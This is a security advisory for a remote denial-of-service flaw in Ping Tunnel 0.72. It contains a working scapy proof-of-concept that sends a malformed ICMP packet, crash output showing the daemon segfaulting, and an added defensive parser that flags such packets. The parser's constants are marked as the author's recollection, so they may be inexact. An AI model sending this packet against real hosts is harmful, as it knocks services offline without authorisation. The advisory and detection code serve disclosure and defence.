Release date:
Updated on:
Affected Systems:
Freecode Ping Tunnel 0.72
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54627
Ping Tunnel (ptunnel) is a tool for reliably tunnelling TCP connections over ICMP. It reaches a remote host through ICMP echo request and echo reply packets, commonly known as ping requests and replies.
A remote denial-of-service vulnerability exists in ptunnel 0.72 and possibly other versions. An attacker can exploit it to crash the affected application.
Source: st3n
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be offensive and is intended only for security research and teaching. Users act at their own risk.
st3n () provides the following test method:
#===============================================================================
# PoC code (scapy)
#===============================================================================
import sys
from scapy.all import *
conf.verb = 0   # scapy's verbosity switch
# Arg?
if len(sys.argv) < 2:
    sys.exit('usage: %s <remote_host>' % sys.argv[0])
# Target
remote_host = sys.argv[1]
# ptunnel.h
# typedef struct {
#     uint32_t magic,     // magic number, used to identify ptunnel packets.
#              dst_ip,    // destination IP and port (used by proxy to figure
#              dst_port,  // out where to tunnel)
#              state,     // current connection state; see constants above.
#              ack,       // sequence number of last packet received from other end
#              data_len;  // length of data buffer
#     uint16_t seq_no,    // sequence number of this packet
#              id_no;     // id number, used to separate different tunnels from each other
#     char     data[0];   // optional data buffer
# } __attribute__((packed)) ping_tunnel_pkt_t;
# Build packet (byte literals so the raw values survive on both Python 2 and 3)
magic    = b'\xd5\x20\x08\x80'   # ptunnel magic number
dst_ip   = b'aaa'
dst_port = b'bbbbbb'
state    = b'cccccc'             # <=== this triggers the vulnerability
ack      = b'\x00\x00\xff'
data_len = b'\x00\x00\x00\x00'
seq_id   = b'dddd'
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)
# Evil packet
send(pkt)
#===============================================================================
# Example & Info
#===============================================================================
# Sending evil packet
# -------------------
# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.
# Daemon side
# -----------
# $ ptunnel -c lo
# [inf]: Starting ptunnel v0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault
# Debug info
# ----------
# Program received signal SIGSEGV, Segmentation fault.
# handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbff65c, icmp_sock=7) at ptunnel.c:957
# 957         pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
# (gdb)
# (gdb) i r
# eax            0x3434343   54739779
# ecx            0x0         0
# edx            0x3434343   54739779
# ebx            0x8050184   134545796
# esp            0xbffff380  0xbffff380
# ebp            0xbffff468  0xbffff468
# esi            0xffff      65535
# edi            0xbffff5c8  -1073744440
# eip            0x804cdfa   0x804cdfa
# eflags         0x10202     [ IF RF ]
# cs             0x73        115
# ss             0x7b        123
# ds             0x7b        123
# es             0x7b        123
# fs             0x0         0
# gs             0x33        51
# EOF
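As an added, defender-side example that is not part of the advisory or of ptunnel itself: a parser for the ping_tunnel_pkt_t header shown above that rejects ptunnel-tagged ICMP payloads whose state field falls outside the defined connection states, which is the malformation the PoC relies on. The magic value and state constants are taken from ptunnel.h as I recall them (an assumption); the sample payloads are constructed.

```python
import struct

# ping_tunnel_pkt_t header from ptunnel.h (the struct above), in network byte
# order: six uint32 then two uint16, 28 bytes before any data.
HDR_FMT = ">IIIIIIHH"
HDR_LEN = struct.calcsize(HDR_FMT)

# Constants as I recall them from ptunnel.h (assumption, not from this advisory).
PING_TUNNEL_MAGIC = 0xD5200880
PROXY_STATES = {0: "start", 1: "ack", 2: "close", 3: "data"}
FLAG_MASK = (1 << 30) | (1 << 31)   # kUser_flag | kProxy_flag

def check_ptunnel_payload(payload):
    """Return (verdict, detail) with verdict "not-ptunnel", "ok" or "malformed".

    "malformed" marks a ptunnel-tagged header no daemon should act on: a state
    outside the defined states (what the PoC above sends), a dst_port that does
    not fit in 16 bits, or a data_len that disagrees with the bytes present.
    """
    if len(payload) < HDR_LEN:
        return "not-ptunnel", "payload shorter than the ptunnel header"
    (magic, dst_ip, dst_port, state, ack,
     data_len, seq_no, id_no) = struct.unpack(HDR_FMT, payload[:HDR_LEN])
    if magic != PING_TUNNEL_MAGIC:
        return "not-ptunnel", "magic 0x%08x is not the ptunnel magic" % magic
    base_state = state & ~FLAG_MASK     # strip the user/proxy flag bits
    if base_state not in PROXY_STATES:
        return "malformed", "state 0x%08x outside the defined states" % state
    if dst_port > 0xFFFF:
        return "malformed", "dst_port %d does not fit in 16 bits" % dst_port
    present = len(payload) - HDR_LEN
    if data_len != present:
        return "malformed", "data_len %d but %d data bytes present" % (data_len, present)
    return "ok", "%s seq=%d id=%d" % (PROXY_STATES[base_state], seq_no, id_no)

def build_header(state, data_len=0, dst_ip=0x7F000001, dst_port=8080,
                 ack=0, seq_no=1, id_no=7):
    """Pack a ptunnel header; used here only to construct sample payloads."""
    return struct.pack(HDR_FMT, PING_TUNNEL_MAGIC, dst_ip, dst_port, state,
                       ack, data_len, seq_no, id_no)

# Constructed samples: a well-formed data packet, and a header whose state
# field is a run of 'c' bytes like the one the PoC above sends.
GOOD_PAYLOAD = build_header(3, data_len=5) + b"hello"
BAD_STATE_PAYLOAD = build_header(0x63636363)

if __name__ == "__main__":
    for name, p in (("good", GOOD_PAYLOAD), ("bad-state", BAD_STATE_PAYLOAD)):
        print(name, check_ptunnel_payload(p))
```

The same check can be run over the ICMP payloads a pcap capture or IDS hands you to spot such packets before they reach the daemon.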
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Freecode
--------
Currently, the vendor has not released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://freecode.com/projects/